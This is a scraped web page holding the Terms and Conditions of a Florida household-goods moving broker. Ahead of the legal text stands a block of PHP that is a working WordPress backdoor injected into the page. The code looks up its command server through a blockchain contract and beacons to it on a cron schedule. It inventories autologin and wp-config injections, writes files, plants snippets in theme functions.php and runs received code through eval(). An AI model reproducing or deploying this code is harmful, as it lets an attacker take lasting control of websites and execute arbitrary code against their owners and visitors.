// 7s_r5 if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/opt/bitnami/wordpress/wp-content/plugins/wp-helper-a0fbea/wp-helper-a0fbea.php', 'ctrl'=>'// 7s_r5', 'vis'=>'// yx_hj', 'vis_func'=>'wp_pp7j64', 'vis_paths'=>array('/opt/bitnami/wordpress/wp-content/plugins/wp-helper-a0fbea/wp-helper-a0fbea.php'), 'opt'=>'_wp_9x8gnypq', ); $keys=array(); $keys['id']='f13'; $keys['ver']='de'; $keys['caps']='t2k'; $keys['tasks']='pqw'; $keys['interval']='bdk'; $keys['ack_id']='m28'; $keys['ok']='hs'; $keys['detail']='rj8'; $keys['inv']='o4c'; $keys['result']='0mi'; $hdr='X-35S-Auth';$tok='_veWetDZlld20YOpSuceyjMMWg2VXQWGw5je69YMOKM';$id='d912e47b06f4e20a';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Terms & Conditions - America First Moving

Terms and Conditions for America First Moving Services, llc

Effective Date: August 21, 2026

Welcome to America First Moving. These Terms and Conditions (“Terms”) govern your access to and use of www.AmericaFirstMoving.com (the “Website”), your submission of information through the Website, your communications with America First Moving, and certain services offered or coordinated by America First Moving Services, LLC (“America First Moving,” “AFM,” “we,” “us,” or “our”).

By accessing or using this Website, requesting a quote, submitting information through a Website form, or otherwise using our online services, you acknowledge that you have read and agree to these Terms.

If you do not agree with these Terms, please do not use the Website.

1. COMPANY INFORMATION

America First Moving Services, LLC
1525 NW 3rd Street, Suite 8
Deerfield Beach, Florida 33442

Phone: 888-270-7875
Customer Support: 754-333-2018
Email: Info@AmericaFirstMoving.com

USDOT No.: 3709259
MC No.: 1301105

2. AMERICA FIRST MOVING IS A MOVING BROKER

America First Moving is a federally licensed interstate household-goods moving broker.

America First Moving is not a motor carrier and does not transport, pack, load, unload, store, or physically handle household goods.

Our role is to assist customers in arranging transportation services with independent, properly authorized motor carriers within our network.

The motor carrier assigned to perform a customer’s move is a separate and independent business responsible for the actual transportation services, including pickup, loading, transportation, delivery, unloading, and any carrier-provided packing or storage services.

The carrier’s transportation services are subject to the carrier’s applicable tariff, bill of lading, policies, operating authority, and other applicable agreements.

Nothing on this Website should be interpreted as representing that America First Moving will personally transport a customer’s household goods.

3. MOVING QUOTE REQUESTS

Customers may request a free moving quote through the Website, by telephone, or through another approved communication channel.

When requesting a quote, you may be asked to provide information including, but not limited to:

  • Name

  • Telephone number

  • Email address

  • Origin and destination ZIP codes or addresses

  • Requested move date

  • Residence size

  • Household inventory

  • Packing requirements

  • Access conditions

  • Storage requirements

  • Special handling requirements

  • Other information relevant to the requested move

You agree to provide information that is accurate and complete to the best of your knowledge.

Submitting a quote request does not by itself create a binding agreement for moving services.

A move is not considered reserved solely because a customer submits information through the Website.

4. ESTIMATES AND PRICING

Moving estimates are prepared using the information supplied by the customer regarding the move, including the household inventory, volume of goods, services requested, pickup and delivery locations, access conditions, packing requirements, and other relevant circumstances.

America First Moving and the motor carriers in its network may calculate estimated transportation charges based on the cubic-foot volume or space required for the shipment and other applicable services.

An estimate is based on the accuracy and completeness of the information available at the time it is prepared.

If the customer adds items, increases the volume of the shipment, requests additional packing or services, changes locations, or if conditions at pickup or delivery differ materially from the information originally provided, additional charges may apply in accordance with the applicable agreement and carrier tariff.

Customers should carefully review all estimates, inventories, service descriptions, and related documents before signing or accepting them.

5. CARRIER ASSIGNMENT

America First Moving coordinates transportation through independent motor carriers authorized to transport household goods.

The identity of the assigned carrier may be provided before the scheduled pickup in accordance with applicable law and company procedures.

The carrier performing the transportation remains independently responsible for its employees, drivers, equipment, transportation operations, pickup, delivery, shipment handling, carrier documentation, and compliance obligations.

America First Moving does not control the carrier’s day-to-day transportation operations.

6. PICKUP AND DELIVERY DATES

Unless expressly stated otherwise in a written agreement, pickup and delivery dates or windows may be estimates rather than guarantees.

Actual transportation schedules may be affected by circumstances including:

  • Weather

  • Traffic

  • Road conditions

  • Mechanical issues

  • Federal hours-of-service requirements

  • Carrier routing

  • Shipment consolidation

  • Customer availability

  • Access restrictions

  • Acts of government

  • Natural disasters

  • Other circumstances outside the reasonable control of America First Moving

Customers should review the applicable carrier documents for specific pickup and delivery terms.

7. CUSTOMER RESPONSIBILITIES

Customers are responsible for providing complete and accurate information regarding their move.

This includes disclosing, when applicable:

  • All household goods intended for transportation

  • Oversized or unusually heavy items

  • Fragile or high-value items

  • Stairs

  • Elevators

  • Long carries

  • Shuttle requirements

  • Restricted truck access

  • Parking limitations

  • Storage requirements

  • Packing requirements

  • Changes to the inventory

  • Changes to pickup or delivery locations

  • Other conditions that may affect the services required

Failure to disclose relevant information may result in pricing adjustments or additional charges pursuant to the customer’s agreement and the assigned carrier’s tariff.

8. PROHIBITED OR RESTRICTED ITEMS

Motor carriers may prohibit or restrict the transportation of certain property.

Examples may include hazardous materials, explosives, firearms or ammunition, flammable substances, illegal drugs, perishable goods, plants, animals, currency, important documents, jewelry, medications, or other items subject to carrier or legal restrictions.

Customers are responsible for reviewing prohibited-item requirements with the assigned motor carrier before transportation.

9. CANCELLATIONS AND REFUNDS

Reservations and cancellations are subject to America First Moving’s applicable written cancellation policy and the terms of the customer’s signed moving agreement.

America First Moving’s current cancellation policy is available on the Website.

Where there is a conflict between general information on the Website and a customer’s executed agreement relating to a specific move, the executed agreement will control to the extent permitted by applicable law.

Customers should review all cancellation and refund provisions before making a reservation or payment.

10. PAYMENTS

Certain deposits, broker fees, transportation charges, packing charges, storage charges, and other service-related payments may be required in connection with a move.

Payment amounts, due dates, accepted methods of payment, and refundability are governed by the applicable estimate, reservation agreement, carrier documentation, tariff, and other written agreements associated with the move.

Charges owed directly to an assigned motor carrier may be collected separately from amounts paid to America First Moving.

11. THIRD-PARTY MOTOR CARRIERS AND SERVICES

America First Moving works with independent motor carriers and may also provide access to information or services supplied by third parties.

These third parties are independent entities and are not employees of America First Moving.

America First Moving is not responsible for the independent acts or omissions of a motor carrier or other third-party provider except to the extent responsibility is imposed upon America First Moving by applicable law.

Claims involving loss or damage to household goods during transportation generally must be handled in accordance with the assigned carrier’s bill of lading, valuation coverage, claims procedures, tariff, and applicable federal law.

12. SMS AND TEXT MESSAGE TERMS

America First Moving Messaging Program

By voluntarily providing your mobile telephone number and affirmatively opting in to receive text messages, you consent to receive SMS and/or MMS messages from America First Moving at the telephone number you provided.

Messages may include communications related to:

  • Your moving quote request

  • Follow-up regarding your requested moving services

  • Appointment or scheduling information

  • Reservation and move updates

  • Customer service communications

  • Account or transaction-related information

  • Service information

  • Promotional or marketing communications, when permitted by your consent

Message frequency varies.

Message and data rates may apply.

You may opt out of receiving text messages at any time by replying STOP to any message.

After submitting a STOP request, you may receive a final confirmation message stating that you have been unsubscribed.

For assistance, reply HELP to a message or contact America First Moving at:

Phone: 888-270-7875
Email: Info@AmericaFirstMoving.com

Consent to receive marketing text messages is not a condition of purchasing any goods or services.

Your consent applies only to the telephone number you provided. You represent that you are the subscriber or customary user of that telephone number and that you are authorized to provide consent for messages to be sent to it.

Wireless carriers are not liable for delayed or undelivered messages.

Supported carriers and messaging availability may vary.

If your mobile telephone number changes or is reassigned, you should notify America First Moving or opt out before discontinuing use of the number.

13. SMS PRIVACY

America First Moving respects the privacy of users who opt in to its messaging program.

Mobile information, including mobile telephone numbers, SMS opt-in data, and messaging consent, will not be sold, rented, or shared with third parties or affiliates for their own marketing or promotional purposes.

Information may be shared with service providers when necessary to operate the messaging service, provide requested services, maintain Website functionality, prevent fraud, comply with legal obligations, or otherwise support America First Moving’s business operations, subject to appropriate restrictions.

For additional information regarding how America First Moving collects, uses, stores, and protects personal information, please review our Privacy Policy.

14. TELEPHONE AND ELECTRONIC COMMUNICATIONS

When you voluntarily provide your telephone number, email address, or other contact information, you authorize America First Moving to contact you regarding your inquiry, quote request, reservation, account, or requested services as permitted by applicable law and any consent you have provided.

Communications may be made by telephone, email, or text message.

Marketing communications requiring consent will be sent in accordance with applicable consent requirements.

You may withdraw consent to receive marketing text messages by following the opt-out procedure described in these Terms.

15. WEBSITE USE

You may use this Website only for lawful purposes.

You agree not to:

  • Use the Website in violation of applicable law

  • Attempt to gain unauthorized access to the Website or its systems

  • Interfere with the operation or security of the Website

  • Introduce malware, viruses, or malicious code

  • Scrape or harvest Website information through unauthorized automated means

  • Misrepresent your identity

  • Submit fraudulent information

  • Use the Website to infringe the rights of another person or entity

  • Copy or commercially exploit Website content without authorization

America First Moving may restrict or terminate access to the Website if it reasonably believes a user has violated these Terms.

16. INTELLECTUAL PROPERTY

Unless otherwise stated, the Website and its content, including text, graphics, logos, images, designs, software, trademarks, service marks, and other materials, are owned by or licensed to America First Moving and are protected by applicable intellectual property laws.

You may access Website materials for personal, non-commercial use.

You may not reproduce, distribute, modify, sell, license, publish, or commercially exploit Website content without prior written permission from America First Moving or the applicable rights holder.

17. THIRD-PARTY LINKS

The Website may contain links to third-party websites or resources.

America First Moving does not control these third-party websites and is not responsible for their content, availability, security, privacy practices, or terms.

The inclusion of a link does not necessarily constitute an endorsement of the third-party website or service.

Users access third-party websites at their own risk.

18. WEBSITE INFORMATION AND DISCLAIMER

America First Moving makes reasonable efforts to provide useful and accurate information on the Website.

However, Website information may occasionally contain typographical errors, outdated information, technical errors, or other inaccuracies.

Information concerning pricing, service availability, carrier availability, scheduling, and moving services may change.

The Website is provided on an “as available” basis to the fullest extent permitted by law.

Nothing contained on the Website replaces the terms of a signed estimate, reservation agreement, bill of lading, carrier tariff, or other agreement applicable to a specific move.

19. LIMITATION OF LIABILITY

To the fullest extent permitted by applicable law, America First Moving will not be liable for indirect, incidental, special, exemplary, punitive, or consequential damages arising solely from the use of or inability to use this Website.

Nothing in these Terms is intended to waive, restrict, or eliminate any right or remedy that cannot legally be waived under applicable federal or state law.

Liability associated with the transportation, handling, loss, or damage of household goods may also be governed by federal transportation law, the assigned carrier’s bill of lading, applicable valuation coverage, and the carrier’s tariff.

20. INDEMNIFICATION

To the fullest extent permitted by law, you agree to indemnify and hold harmless America First Moving Services, LLC and its officers, employees, agents, and representatives from claims, losses, liabilities, damages, and expenses arising from your unlawful misuse of the Website, your material violation of these Terms, or information you knowingly submit through the Website that infringes the rights of another person.

21. PRIVACY POLICY

Your use of the Website is also subject to America First Moving’s Privacy Policy, which explains how personal information is collected, used, disclosed, and protected.

The Privacy Policy should be incorporated into these Terms by reference and made available through a clearly visible link on the Website.

22. FEDERAL MOVING INFORMATION

Customers arranging interstate household-goods moves have important rights and responsibilities under federal law.

America First Moving encourages customers to review the Federal Motor Carrier Safety Administration’s consumer information, including:

  • Your Rights and Responsibilities When You Move

  • Ready to Move? Tips for a Successful Interstate Move

Links to these materials are available through the America First Moving Website and through the Federal Motor Carrier Safety Administration.

23. AGE REQUIREMENT

The Website and America First Moving’s services are intended for individuals who are at least 18 years old and legally capable of entering into agreements.

America First Moving does not knowingly solicit moving reservations from children.

24. CHANGES TO THESE TERMS

America First Moving may update these Terms periodically to reflect changes in its services, business practices, legal obligations, or Website functionality.

When material changes are made, the revised Terms will be posted on this Website with an updated effective date.

Your continued use of the Website following the posting of revised Terms constitutes acceptance of the revised Terms to the extent permitted by law.

25. SEVERABILITY

If any provision of these Terms is determined to be invalid, illegal, or unenforceable, the remaining provisions will remain in full force and effect to the maximum extent permitted by law.

26. NO WAIVER

America First Moving’s failure to enforce any provision of these Terms will not constitute a waiver of that provision or any other provision.

27. GOVERNING LAW

Except where federal transportation law or another applicable federal law governs, these Terms and disputes relating specifically to the use of this Website will be governed by the laws of the State of Florida, without regard to conflict-of-law principles.

Nothing in this provision is intended to limit a consumer’s rights under any law that cannot lawfully be waived or restricted.

28. CONTACT US

Questions regarding these Terms and Conditions may be directed to:

America First Moving Services, LLC
1525 NW 3rd Street, Suite 8
Deerfield Beach, Florida 33442

Phone: 888-270-7875
Customer Support: 754-333-2018
Email: Info@AmericaFirstMoving.com

USDOT No.: 3709259
MC No.: 1301105

Find Out How To Save Up To $2000
On Your Next Move By Entering Your Phone Number &
Our Live Agent Will Call You Immediately

Our Live Agent Are Waiting To Help You Out!